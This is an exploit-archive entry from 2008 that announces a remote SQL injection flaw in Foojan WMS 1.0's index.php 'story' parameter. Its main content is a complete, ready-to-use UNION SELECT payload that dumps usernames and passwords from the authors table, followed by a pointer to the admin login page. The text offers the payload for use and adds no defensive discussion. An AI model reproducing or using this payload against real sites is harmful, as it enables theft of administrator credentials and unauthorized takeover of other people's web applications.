[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability
# Published : 2008-01-23
# Author : IRCRASH
# Previous Title : Seagull 0.6.3 (optimizer.php files) Remote File Disclosure Vulnerability
# Next Title : LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
#####################################################################################
#### Foojan WMS 1.0 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar #
# #
#Injection Adress : http://Sitename/index.php?story=[SQL CODE] #
# #
# #
#[SQL CODE] : 1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*
# #
# #
# #
#Admin Page For Login is ./admin.php #
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
# www.Syue.com [2008-01-23]